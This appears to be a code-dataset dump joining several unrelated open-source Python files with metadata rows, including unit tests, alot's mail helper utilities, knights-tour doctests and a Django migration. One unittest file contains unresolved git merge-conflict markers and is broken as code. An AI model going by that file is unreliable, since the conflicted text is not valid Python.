def test_wonky_nths(self):
vals = [
('a', 1),
([], 1),
# ({}, 'a'), # now raises a TypeError
]
expected = None
for data, n in vals:
self.assertEqual(expected, utils.nth(data, n))
def test_bad_nths(self):
vals = [
({}, 'a', TypeError),
]
for data, n, exc in vals:
self.assertRaises(exc, utils.nth, data, n)
def test_lu(self):
data = {
'a': {
'b': {
'c': [1, 2, 3]}}}
expected = [
('a', {'b': {'c': [1, 2, 3]}}),
('a.b', {'c': [1, 2, 3]}),
('a.b.c', [1, 2, 3])
]
self.assertAllPairsEqual(partial(utils.lu, data), expected)
def test_lu_with_default(self):
data = {'a': {'b': {'c': [1, 2, 3]}}}
expected_default = 'wtf?'
expected = [
('a.b.z', expected_default),
('a.y.z', expected_default),
('x.y.z', expected_default)
]
self.assertAllPairsEqual(partial(utils.lu, data, default=expected_default), expected)
def test_lu_no_default(self):
data = {'a': {'b': {'c': [1, 2, 3]}}}
self.assertRaises(ValueError, utils.lu, data, 'x.y.z')
def test_lu_no_context(self):
data = None
self.assertRaises(ValueError, utils.lu, data, 'a.b.c')
def test_lu_no_dict_context(self):
data = [1, 2, 3]
self.assertRaises(ValueError, utils.lu, data, 'a.b.c')
def test_lu_invalid_path(self):
data = {'a': {'b': {'c': [1, 2, 3]}}}
self.assertRaises(ValueError, utils.lu, data, None)
@patch('time.sleep')
def test_call_while_happy_path(self, sleep):
check = MagicMock()
check.side_effect = [True, True, False]
utils.call_while(check, interval=5)
self.assertEqual(2, len(sleep.mock_calls))
@patch('time.sleep')
def test_call_while_timeout(self, sleep):
check = MagicMock()
check.return_value = True
try:
utils.call_while(check, interval=5, timeout=15)
self.fail("Should not return normally")
except BaseException:
self.assertEqual(3, len(sleep.mock_calls))
@patch('time.sleep')
def test_call_while_timeout_inner_exception_message(self, sleep):
check = MagicMock()
check.return_value = RuntimeError("The answer is not 42")
try:
utils.call_while(check, interval=5, timeout=15)
self.fail("Should not return normally")
except BaseException as e:
self.assertIn("(The answer is not 42)", str(e))
@patch('time.sleep')
def test_call_while_custom_exception(self, sleep):
check = MagicMock()
check.return_value = True
try:
utils.call_while(check, interval=5, timeout=15, exception_class=OSError)
self.fail("Should not return normally")
except OSError as e:
self.assertEqual("Reached timeout 15 while waiting ...", str(e))
@patch('time.sleep')
def test_call_while_custom_message(self, sleep):
check = MagicMock()
check.return_value = True
try:
utils.call_while(check, interval=5, timeout=15, update_msg="waiting for Godot")
self.fail("Should not return normally")
except BaseException as e:
self.assertEqual("Reached timeout 15 while waiting for Godot", str(e))
def test_ensure(self):
utils.ensure(True, "True should allow ensure() to continue")
self.assertRaises(AssertionError, utils.ensure, False, "Error message")
class CustomException(Exception):
pass
self.assertRaises(CustomException, utils.ensure, False, "Error message", CustomException)
def test_nested_dictmap(self):
"nested_dictmap transforms a dictionary recursively as expected"
vals = {'foo': 'pants', 'bar': 'party'}
def func(v):
return v.format(**vals) if utils.isstr(v) else v
cases = [
# given, expected, fn
({'a': 'b'}, {'a': 'b'}, None), # no function, does nothing
({'a': 'b'}, {'a': 'b'}, lambda k, v: (k, v)), # returns inputs
({'a': 'b'}, {'a': 'b'}, lambda k, v: (LOG.debug(k + v), (k, v))[1]), # side effects
# keys as well as values are updated
({'a': {'b': {'{foo}': '{bar}'}}}, {'a': {'b': {'pants': 'party'}}}, lambda k, v: (func(k), func(v))),
]
for given, expected, fn in cases:
self.assertEqual(expected, utils.nested_dictmap(fn, given))
def test_nested_dictmap_2(self):
"nested_dictmap visits replacements too"
def fn(k, v):
if k == 'a':
return k, {'{foo}': v}
k = k.format(foo='bar')
return k, v
cases = [
({'a': 'b'}, {'a': {'bar': 'b'}}, fn),
]
for given, expected, func in cases:
self.assertEqual(expected, utils.nested_dictmap(func, given))
| mit | -8,890,248,451,947,493,000 | 32.358586 | 114 | 0.514913 | false |
seecr/dc-erfgeo-enrich | digitalecollectie/erfgeo/unprefixidentifier.py | 1 | 2107 | ## begin license ##
#
# "Digitale Collectie ErfGeo Enrichment" is a service that attempts to automatically create
# geographical enrichments for records in "Digitale Collectie" (http://digitalecollectie.nl)
# by querying the ErfGeo search API (https://erfgeo.nl/search).
# "Digitale Collectie ErfGeo Enrichment" is developed for Stichting DEN (http://www.den.nl)
# and the Netherlands Institute for Sound and Vision (http://instituut.beeldengeluid.nl/)
# by Seecr (http://seecr.nl).
# The project is based on the open source project Meresco (http://meresco.org).
#
# Copyright (C) 2015 Netherlands Institute for Sound and Vision http://instituut.beeldengeluid.nl/
# Copyright (C) 2015 Seecr (Seek You Too B.V.) http://seecr.nl
# Copyright (C) 2015 Stichting DEN http://www.den.nl
#
# This file is part of "Digitale Collectie ErfGeo Enrichment"
#
# "Digitale Collectie ErfGeo Enrichment" is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# "Digitale Collectie ErfGeo Enrichment" is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with "Digitale Collectie ErfGeo Enrichment"; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
## end license ##
from meresco.core import Observable
class UnprefixIdentifier(Observable):
def __init__(self, prefix='oai:data.digitalecollectie.nl:', **kwargs):
Observable.__init__(self, **kwargs)
self._prefix = prefix
def all_unknown(self, message, identifier, **kwargs):
if identifier.startswith(self._prefix):
identifier = identifier[len(self._prefix):]
yield self.all.unknown(message, identifier=identifier, **kwargs)
| gpl-2.0 | -1,299,950,982,098,095,400 | 46.886364 | 98 | 0.741813 | false |
erikosmond/knights_tour | knights_tour_tests_doc.py | 1 | 8244 | #import doctest
from knights_tour import Board, Position, ChessPiece, Knight, Tour
#I could potentially have one function that calls all other fuctions, so I can create one board and just pass that into each test
def get_weight_from_board(rows, columns, row, column):
"""
The first test expects to have None returned, thus the empty space
>>> get_weight_from_board(rows=0, columns=0, row=0, column=0)
This test would be None but should not happen as only positions that fit on a board should get a weight
>>> get_weight_from_board(rows=4, columns=4, row=5, column=3)
2
>>> get_weight_from_board(rows=8, columns=8, row=8, column=8)
2
>>> get_weight_from_board(rows=8, columns=8, row=8, column=1)
2
>>> get_weight_from_board(rows=8, columns=8, row=4, column=5)
8
>>> get_weight_from_board(rows=4, columns=4, row=2, column=1)
3
"""
board = Board(rows, columns, verbosity=0)
return board.get_weight(row, column)
def knight_moves(rows, columns, row1, column1, row2, column2):
"""
Tests to see if a second knight is created, it has the proper knight moves
>>> knight_moves(rows=8, columns=8, row1=4, column1=5, row2=5, column2=7)
True
"""
board = Board(rows, columns)
position1 = Position(row1, column1, board)
position2 = Position(row2, column2, board)
knight1 = Knight(position1)
knight2 = Knight(position2)
return knight1.moves == knight2.moves
def position_fits_on_board(rows, columns, row, column):
"""
>>> position_fits_on_board(rows = 8, columns = 8, row = 4, column = 5)
True
>>> position_fits_on_board(rows = 4, columns = 4, row = 5, column = 3)
False
>>> position_fits_on_board(rows = 8, columns = 8, row = 9, column = 8)
False
>>> position_fits_on_board(rows = 0, columns = 0, row = 9, column = 8)
False
>>> position_fits_on_board(rows = 8, columns = 8, row = 8, column = 8)
True
>>> position_fits_on_board(rows = 8, columns = 8, row = 1, column = 1)
True
"""
board = Board(rows, columns)
return Position(row, column, board).fits_on_board
def get_new_position(rows, columns, row, column, rdelta, cdelta):
"""
>>> get_new_position(rows=8, columns=8, row=8, column=8, rdelta=-1, cdelta=-2)
(7, 6)
>>> get_new_position(rows=8, columns=8, row=8, column=8, rdelta=1, cdelta=2)
(9, 10)
"""
board = Board(rows, columns)
position = Position(row, column, board)
new_position = position.get_new_position(rdelta, cdelta)
return (new_position.row, new_position.column)
def equal_position(rows, columns, row1, column1, row2, column2):
"""
ensure the position with the same coordinates will be considered equal
>>> equal_position(rows=8, columns=8, row1=8, column1=8, row2=8, column2=8)
True
>>> equal_position(rows=8, columns=8, row1=8, column1=11, row2=8, column2=11)
True
>>> equal_position(rows=8, columns=8, row1=8, column1=8, row2=8, column2=0)
False
>>> equal_position(rows=8, columns=8, row1=4, column1=8, row2=8, column2=4)
False
"""
board = Board(rows, columns)
position1 = Position(row1, column1, board)
position2 = Position(row2, column2, board)
return position1 == position2
def check_board(rows, columns, row, column):
"""
>>> check_board(rows = 8, columns = 8, row = 9, column = 8)
False
>>> check_board(rows = 8, columns = 8, row = 5, column = 5)
True
>>> check_board(rows = 8, columns = 8, row = 0, column = 5)
False
>>> check_board(rows = 8, columns = 8, row = 8, column = 8)
True
"""
board = Board(rows, columns)
position = Position(row, column, board)
return position._check_board()
def valid_pieces(rows=8, columns=8, row=9, column=8):
board = Board(rows, columns)
position = Position(row, column, board)
print position.fits_on_board
def valid_possible_position1(rows, columns, row1, column1, row2, column2):
"""
>>> valid_possible_position1(rows=8, columns=8, row1=4, column1=5, row2=5, column2=7)
False
"""
board = Board(rows, columns)
position1 = Position(row1, column1, board)
position2 = Position(row2, column2, board)
knight = Knight(position1)
knight.record_visited_position(position2)
return knight._valid_position(position1)
def valid_possible_position2(rows, columns, row1, column1, row2, column2):
"""
>>> valid_possible_position2(rows=8, columns=8, row1=4, column1=5, row2=5, column2=7)
False
"""
board = Board(rows, columns)
position1 = Position(row1, column1, board)
position2 = Position(row2, column2, board)
knight = Knight(position1)
knight.record_visited_position(position2)
return knight._valid_position(position2)
def valid_possible_position3(rows, columns, row1, column1, row2, column2):
"""
>>> valid_possible_position3(rows=8, columns=8, row1=4, column1=5, row2=5, column2=7)
True
>>> valid_possible_position3(rows=8, columns=8, row1=4, column1=5, row2=5, column2=11)
False
>>> valid_possible_position3(rows=8, columns=8, row1=9, column1=9, row2=5, column2=7)
True
"""
board = Board(rows, columns)
position1 = Position(row1, column1, board)
position2 = Position(row2, column2, board)
knight = Knight(position1)
return knight._valid_position(position2)
def get_possible_moves(rows, columns, row, column):
"""
>>> get_possible_moves(rows = 8, columns = 8, row = 8, column = 8)
[(7, 6), (6, 7)]
>>> get_possible_moves(rows = 8, columns = 8, row = 4, column = 5)
[(5, 7), (5, 3), (3, 7), (3, 3), (6, 6), (6, 4), (2, 6), (2, 4)]
"""
board = Board(rows, columns)
position = Position(row, column, board)
knight = Knight(position)
positions = []
for p in knight.get_possible_moves():
positions.append(p.coordinate)
return positions
def create_moves(rows, columns, row, column):
"""
Test creating all knight moves
>>> create_moves(rows = 8, columns = 8, row = 8, column = 8)
((1, 2), (1, -2), (-1, 2), (-1, -2), (2, 1), (2, -1), (-2, 1), (-2, -1))
"""
board = Board(rows, columns)
position = Position(row, column, board)
knight = Knight(position)
return knight.create_moves()
def record_visited_position(rows, columns, row1, column1, row2, column2):
"""
>>> record_visited_position(rows=8, columns=8, row1=4, column1=5, row2=5, column2=7)
[(4, 5), (5, 7)]
"""
board = Board(rows, columns)
position1 = Position(row1, column1, board)
position2 = Position(row2, column2, board)
knight = Knight(position1)
knight.record_visited_position(position2)
positions = []
for pos in knight.visited_positions:
positions.append(pos.coordinate)
return positions
def retrace_pop(rows, columns, row1, column1, row2, column2):
"""
>>> retrace_pop(rows=8, columns=8, row1=4, column1=5, row2=5, column2=7)
(4, 5)
"""
board = Board(rows, columns)
position1 = Position(row1, column1, board)
position2 = Position(row2, column2, board)
knight = Knight(position1)
knight.record_visited_position(position2)
return knight.retrace().coordinate
def retrace_visited(rows, columns, row1, column1, row2, column2):
"""
>>> retrace_visited(rows=8, columns=8, row1=4, column1=5, row2=5, column2=7)
(4, 5)
"""
board = Board(rows, columns)
position1 = Position(row1, column1, board)
position2 = Position(row2, column2, board)
knight = Knight(position1)
knight.record_visited_position(position2)
knight.retrace()
return knight.visited_positions[0].coordinate
def generate_start_position(rows, columns, position_coordinate):
"""
Test Tour._generate_start_position
>>> generate_start_position(rows=8, columns=8, position_coordinate="4.5")
(4, 5)
"""
tour = Tour(rows, columns, position_coordinate)
position = tour._generate_start_position(position_coordinate)
return position.coordinate
if __name__ == '__main__':
import doctest
#doctest will only return anything only if there is a failure
doctest.testmod()
| mit | -4,212,573,209,925,292,500 | 33.638655 | 129 | 0.63525 | false |
fnurl/alot | alot/helper.py | 1 | 20813 | # -*- coding: utf-8 -*-
# Copyright (C) 2011-2012 Patrick Totzke <[email protected]>
# Copyright © 2017 Dylan Baker
# This file is released under the GNU GPL, version 3 or a later revision.
# For further details see the COPYING file
from __future__ import absolute_import
from __future__ import division
from datetime import timedelta
from datetime import datetime
from collections import deque
from cStringIO import StringIO
import logging
import mimetypes
import os
import re
import shlex
import subprocess
import email
from email.generator import Generator
from email.mime.audio import MIMEAudio
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import urwid
import magic
from twisted.internet import reactor
from twisted.internet.protocol import ProcessProtocol
from twisted.internet.defer import Deferred
def split_commandline(s, comments=False, posix=True):
"""
splits semi-colon separated commandlines
"""
# shlex seems to remove unescaped quotes and backslashes
s = s.replace('\\', '\\\\')
s = s.replace('\'', '\\\'')
s = s.replace('\"', '\\\"')
# encode s to utf-8 for shlex
if isinstance(s, unicode):
s = s.encode('utf-8')
lex = shlex.shlex(s, posix=posix)
lex.whitespace_split = True
lex.whitespace = ';'
if not comments:
lex.commenters = ''
return list(lex)
def split_commandstring(cmdstring):
"""
split command string into a list of strings to pass on to subprocess.Popen
and the like. This simply calls shlex.split but works also with unicode
bytestrings.
"""
if isinstance(cmdstring, unicode):
cmdstring = cmdstring.encode('utf-8', errors='ignore')
return shlex.split(cmdstring)
def string_sanitize(string, tab_width=8):
r"""
strips, and replaces non-printable characters
:param tab_width: number of spaces to replace tabs with. Read from
`globals.tabwidth` setting if `None`
:type tab_width: int or `None`
>>> string_sanitize(' foo\rbar ', 8)
' foobar '
>>> string_sanitize('foo\tbar', 8)
'foo bar'
>>> string_sanitize('foo\t\tbar', 8)
'foo bar'
"""
string = string.replace('\r', '')
lines = list()
for line in string.split('\n'):
tab_count = line.count('\t')
if tab_count > 0:
line_length = 0
new_line = list()
for i, chunk in enumerate(line.split('\t')):
line_length += len(chunk)
new_line.append(chunk)
if i < tab_count:
next_tab_stop_in = tab_width - (line_length % tab_width)
new_line.append(' ' * next_tab_stop_in)
line_length += next_tab_stop_in
lines.append(''.join(new_line))
else:
lines.append(line)
return '\n'.join(lines)
def string_decode(string, enc='ascii'):
"""
safely decodes string to unicode bytestring, respecting `enc` as a hint.
"""
if enc is None:
enc = 'ascii'
try:
string = unicode(string, enc, errors='replace')
except LookupError: # malformed enc string
string = string.decode('ascii', errors='replace')
except TypeError: # already unicode
pass
return string
def shorten(string, maxlen):
"""shortens string if longer than maxlen, appending ellipsis"""
if 1 < maxlen < len(string):
string = string[:maxlen - 1] + u'\u2026'
return string[:maxlen]
def shorten_author_string(authors_string, maxlength):
"""
Parse a list of authors concatenated as a text string (comma
separated) and smartly adjust them to maxlength.
1) If the complete list of sender names does not fit in maxlength, it
tries to shorten names by using only the first part of each.
2) If the list is still too long, hide authors according to the
following priority:
- First author is always shown (if too long is shorten with ellipsis)
- If possible, last author is also shown (if too long, uses ellipsis)
- If there are more than 2 authors in the thread, show the
maximum of them. More recent senders have higher priority.
- If it is finally necessary to hide any author, an ellipsis
between first and next authors is added.
"""
# I will create a list of authors by parsing author_string. I use
# deque to do popleft without performance penalties
authors = deque()
# If author list is too long, it uses only the first part of each
# name (gmail style)
short_names = len(authors_string) > maxlength
for au in authors_string.split(", "):
if short_names:
author_as_list = au.split()
if len(author_as_list) > 0:
authors.append(author_as_list[0])
else:
authors.append(au)
# Author chain will contain the list of author strings to be
# concatenated using commas for the final formatted author_string.
authors_chain = deque()
if len(authors) == 0:
return u''
# reserve space for first author
first_au = shorten(authors.popleft(), maxlength)
remaining_length = maxlength - len(first_au)
# Tries to add an ellipsis if no space to show more than 1 author
if authors and maxlength > 3 and remaining_length < 3:
first_au = shorten(first_au, maxlength - 3)
remaining_length += 3
# Tries to add as more authors as possible. It takes into account
# that if any author will be hidden, and ellipsis should be added
while authors and remaining_length >= 3:
au = authors.pop()
if len(au) > 1 and (remaining_length == 3 or (authors and
remaining_length < 7)):
authors_chain.appendleft(u'\u2026')
break
else:
if authors:
# 5= ellipsis + 2 x comma and space used as separators
au_string = shorten(au, remaining_length - 5)
else:
# 2 = comma and space used as separator
au_string = shorten(au, remaining_length - 2)
remaining_length -= len(au_string) + 2
authors_chain.appendleft(au_string)
# Add the first author to the list and concatenate list
authors_chain.appendleft(first_au)
authorsstring = ', '.join(authors_chain)
return authorsstring
def pretty_datetime(d):
"""
translates :class:`datetime` `d` to a "sup-style" human readable string.
>>> now = datetime.now()
>>> now.strftime('%c')
'Sat 31 Mar 2012 14:47:26 '
>>> pretty_datetime(now)
u'just now'
>>> pretty_datetime(now - timedelta(minutes=1))
u'1min ago'
>>> pretty_datetime(now - timedelta(hours=5))
u'5h ago'
>>> pretty_datetime(now - timedelta(hours=12))
u'02:54am'
>>> pretty_datetime(now - timedelta(days=1))
u'yest 02pm'
>>> pretty_datetime(now - timedelta(days=2))
u'Thu 02pm'
>>> pretty_datetime(now - timedelta(days=7))
u'Mar 24'
>>> pretty_datetime(now - timedelta(days=356))
u'Apr 2011'
"""
ampm = d.strftime('%p').lower()
if len(ampm):
hourfmt = '%I' + ampm
hourminfmt = '%I:%M' + ampm
else:
hourfmt = '%Hh'
hourminfmt = '%H:%M'
now = datetime.now()
today = now.date()
if d.date() == today or d > now - timedelta(hours=6):
delta = datetime.now() - d
if delta.seconds < 60:
string = 'just now'
elif delta.seconds < 3600:
string = '%dmin ago' % (delta.seconds // 60)
elif delta.seconds < 6 * 3600:
string = '%dh ago' % (delta.seconds // 3600)
else:
string = d.strftime(hourminfmt)
elif d.date() == today - timedelta(1):
string = d.strftime('yest ' + hourfmt)
elif d.date() > today - timedelta(7):
string = d.strftime('%a ' + hourfmt)
elif d.year != today.year:
string = d.strftime('%b %Y')
else:
string = d.strftime('%b %d')
return string_decode(string, 'UTF-8')
def call_cmd(cmdlist, stdin=None):
"""
get a shell commands output, error message and return value and immediately
return.
.. warning::
This returns with the first screen content for interactive commands.
:param cmdlist: shellcommand to call, already splitted into a list accepted
by :meth:`subprocess.Popen`
:type cmdlist: list of str
:param stdin: string to pipe to the process
:type stdin: str
:return: triple of stdout, stderr, return value of the shell command
:rtype: str, str, int
"""
try:
proc = subprocess.Popen(
cmdlist,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE if stdin is not None else None)
out, err = proc.communicate(stdin)
ret = proc.returncode
except OSError as e:
out = b''
err = e.strerror
ret = e.errno
out = string_decode(out, urwid.util.detected_encoding)
err = string_decode(err, urwid.util.detected_encoding)
return out, err, ret
def call_cmd_async(cmdlist, stdin=None, env=None):
"""
get a shell commands output, error message and return value as a deferred.
:type cmdlist: list of str
:param stdin: string to pipe to the process
:type stdin: str
:return: deferred that calls back with triple of stdout, stderr and
return value of the shell command
:rtype: `twisted.internet.defer.Deferred`
"""
class _EverythingGetter(ProcessProtocol):
def __init__(self, deferred):
self.deferred = deferred
self.outBuf = StringIO()
self.errBuf = StringIO()
self.outReceived = self.outBuf.write
self.errReceived = self.errBuf.write
def processEnded(self, status):
termenc = urwid.util.detected_encoding
out = string_decode(self.outBuf.getvalue(), termenc)
err = string_decode(self.errBuf.getvalue(), termenc)
if status.value.exitCode == 0:
self.deferred.callback(out)
else:
terminated_obj = status.value
terminated_obj.stderr = err
self.deferred.errback(terminated_obj)
d = Deferred()
environment = os.environ
if env is not None:
environment.update(env)
logging.debug('ENV = %s', environment)
logging.debug('CMD = %s', cmdlist)
proc = reactor.spawnProcess(_EverythingGetter(d), executable=cmdlist[0],
env=environment,
args=cmdlist)
if stdin:
logging.debug('writing to stdin')
proc.write(stdin)
proc.closeStdin()
return d
def guess_mimetype(blob):
"""
uses file magic to determine the mime-type of the given data blob.
:param blob: file content as read by file.read()
:type blob: data
:returns: mime-type, falls back to 'application/octet-stream'
:rtype: str
"""
mimetype = 'application/octet-stream'
# this is a bit of a hack to support different versions of python magic.
# Hopefully at some point this will no longer be necessary
#
# the version with open() is the bindings shipped with the file source from
# http://darwinsys.com/file/ - this is what is used by the python-magic
# package on Debian/Ubuntu. However, it is not available on pypi/via pip.
#
# the version with from_buffer() is available at
# https://github.com/ahupp/python-magic and directly installable via pip.
#
# for more detail see https://github.com/pazz/alot/pull/588
if hasattr(magic, 'open'):
m = magic.open(magic.MAGIC_MIME_TYPE)
m.load()
magictype = m.buffer(blob)
elif hasattr(magic, 'from_buffer'):
# cf. issue #841
magictype = magic.from_buffer(blob, mime=True) or magictype
else:
raise Exception('Unknown magic API')
# libmagic does not always return proper mimetype strings, cf. issue #459
if re.match(r'\w+\/\w+', magictype):
mimetype = magictype
return mimetype
def guess_encoding(blob):
"""
uses file magic to determine the encoding of the given data blob.
:param blob: file content as read by file.read()
:type blob: data
:returns: encoding
:rtype: str
"""
# this is a bit of a hack to support different versions of python magic.
# Hopefully at some point this will no longer be necessary
#
# the version with open() is the bindings shipped with the file source from
# http://darwinsys.com/file/ - this is what is used by the python-magic
# package on Debian/Ubuntu. However it is not available on pypi/via pip.
#
# the version with from_buffer() is available at
# https://github.com/ahupp/python-magic and directly installable via pip.
#
# for more detail see https://github.com/pazz/alot/pull/588
if hasattr(magic, 'open'):
m = magic.open(magic.MAGIC_MIME_ENCODING)
m.load()
return m.buffer(blob)
elif hasattr(magic, 'from_buffer'):
m = magic.Magic(mime_encoding=True)
return m.from_buffer(blob)
else:
raise Exception('Unknown magic API')
def libmagic_version_at_least(version):
"""
checks if the libmagic library installed is more recent than a given
version.
:param version: minimum version expected in the form XYY (i.e. 5.14 -> 514)
with XYY >= 513
"""
if hasattr(magic, 'open'):
magic_wrapper = magic._libraries['magic']
elif hasattr(magic, 'from_buffer'):
magic_wrapper = magic.libmagic
else:
raise Exception('Unknown magic API')
if not hasattr(magic_wrapper, 'magic_version'):
# The magic_version function has been introduced in libmagic 5.13,
# if it's not present, we can't guess right, so let's assume False
return False
return magic_wrapper.magic_version >= version
# TODO: make this work on blobs, not paths
def mimewrap(path, filename=None, ctype=None):
"""Take the contents of the given path and wrap them into an email MIME
part according to the content type. The content type is auto detected from
the actual file contents and the file name if it is not given.
:param path: the path to the file contents
:type path: str
:param filename: the file name to use in the generated MIME part
:type filename: str or None
:param ctype: the content type of the file contents in path
:type ctype: str or None
:returns: the message MIME part storing the data from path
:rtype: subclasses of email.mime.base.MIMEBase
"""
with open(path, 'rb') as f:
content = f.read()
if not ctype:
ctype = guess_mimetype(content)
# libmagic < 5.12 incorrectly detects excel/powerpoint files as
# 'application/msword' (see #179 and #186 in libmagic bugtracker)
# This is a workaround, based on file extension, useful as long
# as distributions still ship libmagic 5.11.
if (ctype == 'application/msword' and
not libmagic_version_at_least(513)):
mimetype, _ = mimetypes.guess_type(path)
if mimetype:
ctype = mimetype
maintype, subtype = ctype.split('/', 1)
if maintype == 'text':
part = MIMEText(content.decode(guess_encoding(content), 'replace'),
_subtype=subtype,
_charset='utf-8')
elif maintype == 'image':
part = MIMEImage(content, _subtype=subtype)
elif maintype == 'audio':
part = MIMEAudio(content, _subtype=subtype)
else:
part = MIMEBase(maintype, subtype)
part.set_payload(content)
# Encode the payload using Base64
email.encoders.encode_base64(part)
# Set the filename parameter
if not filename:
filename = os.path.basename(path)
part.add_header('Content-Disposition', 'attachment',
filename=filename)
return part
def shell_quote(text):
"""Escape the given text for passing it to the shell for interpretation.
The resulting string will be parsed into one "word" (in the sense used in
the shell documentation, see sh(1)) by the shell.
:param text: the text to quote
:type text: str
:returns: the quoted text
:rtype: str
"""
return "'%s'" % text.replace("'", """'"'"'""")
def humanize_size(size):
"""Create a nice human readable representation of the given number
(understood as bytes) using the "KiB" and "MiB" suffixes to indicate
kibibytes and mebibytes. A kibibyte is defined as 1024 bytes (as opposed to
a kilobyte which is 1000 bytes) and a mibibyte is 1024**2 bytes (as opposed
to a megabyte which is 1000**2 bytes).
:param size: the number to convert
:type size: int
:returns: the human readable representation of size
:rtype: str
"""
for factor, format_string in ((1, '%i'),
(1024, '%iKiB'),
(1024 * 1024, '%.1fMiB')):
if size / factor < 1024:
return format_string % (size / factor)
return format_string % (size / factor)
def parse_mailcap_nametemplate(tmplate='%s'):
"""this returns a prefix and suffix to be used
in the tempfile module for a given mailcap nametemplate string"""
nt_list = tmplate.split('%s')
template_prefix = ''
template_suffix = ''
if len(nt_list) == 2:
template_suffix = nt_list[1]
template_prefix = nt_list[0]
else:
template_suffix = tmplate
return (template_prefix, template_suffix)
def parse_mailto(mailto_str):
"""
Interpret mailto-string
:param mailto_str: the string to interpret. Must conform to :rfc:2368.
:type mailto_str: str
:return: the header fields and the body found in the mailto link as a tuple
of length two
:rtype: tuple(dict(str->list(str)), str)
"""
if mailto_str.startswith('mailto:'):
import urllib
to_str, parms_str = mailto_str[7:].partition('?')[::2]
headers = {}
body = u''
to = urllib.unquote(to_str)
if to:
headers['To'] = [to]
for s in parms_str.split('&'):
key, value = s.partition('=')[::2]
key = key.capitalize()
if key == 'Body':
body = urllib.unquote(value)
elif value:
headers[key] = [urllib.unquote(value)]
return (headers, body)
else:
return (None, None)
def mailto_to_envelope(mailto_str):
"""
Interpret mailto-string into a :class:`alot.db.envelope.Envelope`
"""
from alot.db.envelope import Envelope
headers, body = parse_mailto(mailto_str)
return Envelope(bodytext=body, headers=headers)
def RFC3156_canonicalize(text):
"""
Canonicalizes plain text (MIME-encoded usually) according to RFC3156.
This function works as follows (in that order):
1. Convert all line endings to \\\\r\\\\n (DOS line endings).
2. Ensure the text ends with a newline (\\\\r\\\\n).
3. Encode all occurences of "From " at the beginning of a line
to "From=20" in order to prevent other mail programs to replace
this with "> From" (to avoid MBox conflicts) and thus invalidate
the signature.
:param text: text to canonicalize (already encoded as quoted-printable)
:rtype: str
"""
text = re.sub("\r?\n", "\r\n", text)
if not text.endswith("\r\n"):
text += "\r\n"
text = re.sub("^From ", "From=20", text, flags=re.MULTILINE)
return text
def email_as_string(mail):
"""
Converts the given message to a string, without mangling "From" lines
(like as_string() does).
:param mail: email to convert to string
:rtype: str
"""
fp = StringIO()
g = Generator(fp, mangle_from_=False, maxheaderlen=78)
g.flatten(mail)
as_string = RFC3156_canonicalize(fp.getvalue())
if isinstance(mail, MIMEMultipart):
# Get the boundary for later
boundary = mail.get_boundary()
# Workaround for http://bugs.python.org/issue14983:
# Insert a newline before the outer mail boundary so that other mail
# clients can verify the signature when sending an email which contains
# attachments.
as_string = re.sub(r'--(\r\n)--' + boundary,
r'--\g<1>\g<1>--' + boundary,
as_string, flags=re.MULTILINE)
return as_string
| gpl-3.0 | 5,192,336,678,170,296,000 | 32.567742 | 79 | 0.617769 | false |
ArcherSys/ArcherSys | Lib/unittest/test/testmock/__init__.py | 1 | 1535 | <<<<<<< HEAD
<<<<<<< HEAD
import os
import sys
import unittest
here = os.path.dirname(__file__)
loader = unittest.defaultTestLoader
def load_tests(*args):
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "unittest.test.testmock." + fn[:-3]
__import__(modname)
module = sys.modules[modname]
suite.addTest(loader.loadTestsFromModule(module))
return suite
=======
import os
import sys
import unittest
here = os.path.dirname(__file__)
loader = unittest.defaultTestLoader
def load_tests(*args):
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "unittest.test.testmock." + fn[:-3]
__import__(modname)
module = sys.modules[modname]
suite.addTest(loader.loadTestsFromModule(module))
return suite
>>>>>>> b875702c9c06ab5012e52ff4337439b03918f453
=======
import os
import sys
import unittest
here = os.path.dirname(__file__)
loader = unittest.defaultTestLoader
def load_tests(*args):
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "unittest.test.testmock." + fn[:-3]
__import__(modname)
module = sys.modules[modname]
suite.addTest(loader.loadTestsFromModule(module))
return suite
>>>>>>> b875702c9c06ab5012e52ff4337439b03918f453
| mit | -7,664,057,494,624,798,000 | 25.929825 | 61 | 0.631922 | false |
Alaxe/judgeSystem | users/migrations/0003_auto_20150628_1423.py | 1 | 1618 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.utils.timezone import utc
import datetime
class Migration(migrations.Migration):
dependencies = [
('users', '0002_auto_20150628_1254'),
]
operations = [
migrations.RemoveField(
model_name='userproblemdata',
name='problem',
),
migrations.RemoveField(
model_name='userproblemdata',
name='user',
),
migrations.RemoveField(
model_name='userstatts',
name='user',
),
migrations.AlterField(
model_name='confirmation',
name='code',
field=models.CharField(max_length=32, default='1S5YH6W2QZM6M2CAON7SRYVOHW3QGJ6L'),
),
migrations.AlterField(
model_name='confirmation',
name='created',
field=models.DateTimeField(default=datetime.datetime(2015, 6, 28, 11, 23, 5, 785908, tzinfo=utc)),
),
migrations.AlterField(
model_name='passreset',
name='code',
field=models.CharField(max_length=32, default='5OXTRMZ5U464J91IFWXJFTODJSWGI8YW'),
),
migrations.AlterField(
model_name='passreset',
name='created',
field=models.DateTimeField(default=datetime.datetime(2015, 6, 28, 11, 23, 5, 786551, tzinfo=utc)),
),
migrations.DeleteModel(
name='UserProblemData',
),
migrations.DeleteModel(
name='UserStatts',
),
]
| gpl-2.0 | -1,409,407,466,053,704,200 | 28.962963 | 110 | 0.566749 | false |
prestodb/presto-admin | tests/unit/test_topology.py | 1 | 4727 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
